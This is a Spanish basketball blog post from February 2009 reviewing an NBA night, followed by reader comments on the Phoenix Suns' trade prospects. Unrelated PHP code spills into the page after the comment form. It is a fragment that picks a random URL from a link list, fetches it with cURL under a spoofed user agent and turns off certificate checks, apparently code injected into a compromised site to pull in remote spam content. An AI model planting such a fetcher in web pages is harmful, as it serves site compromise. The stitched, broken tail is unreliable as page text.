La crónica (9/02/2009)

10 de February de 2009 por MagicJohnson32

La de anoche puede considerarse una jornada de transición, pero con varias “sorpresas” entrecomilladas bastante importantes.

En el partido más destacado, los Suns se dieron un batacazo gordo en Philadelphia. Se trata de algo más que una simple derrota pues rozaron el ridículo. La tríada Iguadala-Young-Speights los hizo polvo y ya no carburan ni en ataque ni en defensa. Contemplar cómo se arrastran algunos ilustres de este equipo da que pensar y ahora se habla de que la crisis puede dar al traste con las operaciones que buscaban; ya sólo les faltaba eso. Surgen muchas dudas sobre quién va a tirar del carro a partir de ahora. La espada de Damocles lleva ya algún tiempo sobre Porter. No daría un duro por él.

Y para actuaciones desastrosas las del trío Yao-MacGrady-Battier en Milwaukee, que lastraron al resto del equipo hacia la derrota. Sessions, Jefferson, Villanueva… e incluso Charlie Bell están dando un paso adelante frente la adversidad. ¡¡¡Vamos Bucks!!!

Resulta menos chocante la derrota de unos Hornets diezmados, aunque sea contra los Grizzlies. Sólo Pedja fue capaz de disputar el partido, lo que supone muy poca artillería aún cuando los Grizzlies tampoco contaron con Rudy Gay. Grandísimo partido de Mayo, con 16 rebotazos, bueno de Conley y Warrick y correcto Gasol, suficiente para ganar. Mejorarán un poco con la vuelta de Milicic, tanto en cuanto mantenga la actitud de antes de la lesión.

Finalmente, los Bobcats se deshicieron sin excesivos problemas de los Clippers. Radmanovic se salió, por cierto.

La noticia triste es la lesión de Al Jefferson que se perderá lo que queda de temporada. Una lástima pasar de ser firme candidato a estar en el All-Star a ver los partidos desde el banquillo. Los Wolves y todos los equipos de ligas fantásticas donde está llorarán su ausencia.

PREMIOS

MVP:Ha tenido que lesionarse Ridnour para que Ramon Sessions pudiera volver a gozar del status de titular con el acabó la temporada pasada. Ayer 26 puntos, 7 asistencias, 4 rebotes, 4 robos y un fenomenal 8 de 12 en tiros. Impresionante.

Rookie:A pesar de los 22 puntos, 5 asistencias y 16 rebotes de OJ Mayo, el premio para el mejor Rookie de la noche se lo vamos a otorgar a Marresse Speights que en 24 minutitos anotó 24 puntos con un 11 de 16 en tiros y recogió 7 rebotes. Amare y Shaq aún le están buscando.

Sorpresa: Que Mayo coja 16 rebotes o Marresse Speights anote 24 puntos es una sorpresa mayúscula pero como no queremos repetir galardonados se lo vamos a dar a los 13 puntos de Steve Novak. Eso sí. No le pidáis nada más.

Decepción: Como ya hemos comentado en la crónica hoy el premio va para 2 equipos ex-aquo. Por uno lado lo recogen unos Phoenix Suns que vagan sin rumbo fijo por la liga y por el otro el quinteto titular de los Rockets que, sin contar a Scola que cuajó un buen partido, anotó tan solo 5 tiros de 28 lanzamientos.

Mayor esfuerzo en vano: Zach ha vuelto y lo ha hecho en plena forma. Ayer 20 puntos, 10 rebotes y 4 asistencias que no sirvieron para vencer en su partido contra los Bobcats. Mención especial para Aaron Brooks, Ron Artest y Carl Landry, que aparte de jugar contra los Bucks tuvieron que lidiar con la ineficiencia de sus compañeros.

pauodomRAZONES PARA TRASNOCHAR

De entre los nueve partidos que se disputarán la madrugada del martes al miércoles hay uno que, pese a enfrentar a dos equipos que están fuera de posiciones de Playoffs, recomendamos no perderse:

Knicks @ Warriors. Mike D’Antoni contra Don Nelson. Ataques cortos, defensas mínimas, y puntos, muchos puntos. Se suma además el morbo de ver a Al Harrington de regreso al Oracle Arena, de donde se marchó tras señalar públicamente sus diferencias con Nelson. Seguro que a él y a Jamal Crawford les encantaría demostrar un par de cosas ante sus respectivos ex equipos. Otra cuestión interesante es: ¿cuántas decenas de rebotes atrapará David Lee?

El jugador al que conviene seguir de cerca esta noche es… Lamar Odom. Tenemos curiosidad por saber si su exhibición en Cleveland fue un espejismo o realmente Odom está en condiciones de dar el paso adelante que durante tanto tiempo llevamos esperando de él.

La pregunta del día: Jugad a ser Steve Keer. ¿Qué pasos deberían seguir los Suns de aquí a final de temporada? Y no. No vale abandonar.

Comenta

7 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Parece ser que la situación es poco menos que insostenible.
    Por un lado, Stoudemire está hasta el gorro de Porter, como también lo debe estar Nash. Diría que ahora mismo, por narices, hay que elegir entre el entrenador y ellos.
    Podría ser entendible (hasta cierto) punto optar por confirmar el cambio de rumbo del equipo apostando por el entrenador, pero el mercado ahora mismo da muy pocas alternativas para (como dijo Magic) empaquetar contratazos como los que estamos hablando. Así que el asunto, teóricamente, girará en mal vender deportivamente al estilo de Wallace con Gasol. O lo que es lo mismo… reconstrucción de las gordas que deberían hacer arrepentirse a Kerr del maldito día que se le ocurrió asumir el contrato de O’neal.

    Siendo positivos, se habla de algunos nombres con respecto a Stat… Ellis&Biedrins, Bosh, Sheed&Prince o Thomas&Gooden y un largo etc… no parecen malas alternativas si no fuera porque ahora mismo son poco más que pajas mentales.

      Citar

  2. MagicJohnson32 dice:
    #2

    Lo que he leído es Ellis o Biedrins, nunca ambos. Lógicamente.

    Y a mí me parece que son los Suns los que están hasta el gorro de Amare, por varias razones. Yo de los Suns me lo quitaba de encima a cambio de buenos contratos y algún joven.

      Citar

  3. TheDeerHunter dice:
    #3

    Tampoco estaría de más que compartieras con nosotros cuáles son esas razones que dices tienen los suns para estar hasta el gorro de Amaré, en una mala temporada general del equipo y que ha sido merecidamente elegido para el All-Star.

      Citar

  4. Viva_Dirk dice:
    #4

    Supongo que parte de esas razones serán las rajadas que pega de vez en cuando. Cuando estaba D’Antoni era que no habia sistema defensivo y ahora que jugando de esta manera no puede llegar a ser una estrella como Kobe o Lebron, eso si nunca hace autocrítica.

    Pues yo si fuese Kerr traspasaría casi todo, jeje. Con Nash lo tienen facil, me traeria sin dudarlo a Calderon, que es mas adecuado para un juego mas lento y defiende mejor, a poder ser me traería con el a Graham; ni que decir tiene que Nash me parece mejor jugador. Con Amare seguramente buscaría en los Bulls: Gordon, Tyrus, Nocioni, rondas del draft, en fin les pediria de todo y los Bulls manteniendo a Rose+Deng deberian aceptar. En caso de no cuadrar eso habria varias opciones tipo Oklahoma(Green+ronda+hueco salarial), Clippers(Kaman+ronda), GSW(Biedrins+ronda).

    En fin, no creo que lo tengan tan crudo porque material para mover tienen.

      Citar

  5. TheDeerHunter dice:
    #5

    Para mover sí… pero para hacer cualquier cosa que no sea “mal-traspasar” y/o reconstruir ya lo tienen más chungo.

    Lo que sí te voy adelantando es que va a pesar más “la pela” que cualquier consideración deportiva. Y eso para Phoenix sólo significa una cosa…

      Citar

  6. Viva_Dirk dice:
    #6

    Yo no los veo mal para poder ser competitivos el año que viene y aspirantes al siguiente, pero no puede temblar la mano.

    Nash con los años que tiene sirve ahora mismo para jugar al ataque sin que nadie le quite las riendas, cada año que pasa es peor defensor. La operación con Calderón es clara, Steve cobra 12 millones y Jose 7, metiendo el contrato de Garbajosa la cosa cuadra y Phoenix evidentemente deberia pedir compensación por si cuela, por ejemplo la 1ª ronda de Toronto.

    Y con Amare pongamonos en el peor de los casos y que no puedan conseguir ningun All-Star consagrado por el, que tengan casi que ‘mal-traspasar’ como tu dices. Con Oklahoma puedes hacer perfectamente este traspaso: Jeff Green+salarios que terminan contrato+1ª ronda.

    Haciendo esos 2 movimientos el equipo que se les queda el año que viene es Calderón-Barbosa-Richardson-Green-Shaq, con dos elecciones muy probablemente top-10 y sin pagar ni un dolar de luxury tax.
    Vamos si cogen por decir 2, a Thabbet y Monroe se les queda un equipo majo.

    El siguiente tienes eso mismo sin Shaq y sus 20 millones libres….el año que mas cracks acaban y con sus dos rookies con un año mas de experiencia. La lista de agentes libres es larguísima: Lebron, Wade, Bosh, Nowitzki, Joe Johnson, Yao, Redd, Ginobili, y luego restringidos los Roy, Aldridge, Gay, Foye, etc.

      Citar

  7. TheDeerHunter dice:
    #7

    Me parece razonable tu planteamiento Viva… pero no demasiado realista.

    Dices: “con Amare pongamonos en el peor de los casos y que no puedan conseguir ningun All-Star consagrado”. Es que ese no es el peor de los casos… el peor de los casos es que se coman con patatas y completamente desmotivado.
    En los tiempos que corren veo difícil que cualquiera esté dispuesto a asumir tal pastizal, a no ser, que le mueva algún objetivo muy concreto… léase meterse en una final esta misma temporada, por poner algo.
    No es el caso de los Thunder, de hecho, veo bastante poco sentido en ese hipotético traspaso aunque si al final lo lograran seguramente será similar al que has propuesto tú: Jovencito+Expiring/s+(quizás)elección… pero no vislumbro ningún joven del corte buscado que por sí sólo pueda dar ese “competitivos éste y aspirantes al siguiente”.

    Por la parte de Nash, el asunto lo veo todavía más crudo. Al volumen del contrato hay que unir ahora mismo el perfil del jugador orientado a un tipo de juego muy concreto. Ahora mismo no se me ocurre quién se la jugaría por él y fliparía bastante si alguien me dice que será Toronto y/o Calderón.
    No veo ningún equipo que pudiera hacer rentable el beneficio inmediato de Nash por ese precio ni tampoco imagino ningún equipo que quiera a Nash sin esas necesidades inmediatas de las que hablo… al menos con Amaré todavía se pueden hacer cosas alrededor suyas. En el caso del canadiense ya es difícil que nos ofrezca algo similar a lo que nos ha dado.

    Así que si tienen problemas para encasquetar a alguno, a los dos ya se me antoja hartamente improbable y todo pasaría por recibir a cambio jugadores muy poco o nada preparados para los objetivos que se perseguían al principio de temporada y que mucho tendrán que alinearse los astros para considerarlos competitivos siquiera el año que viene.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>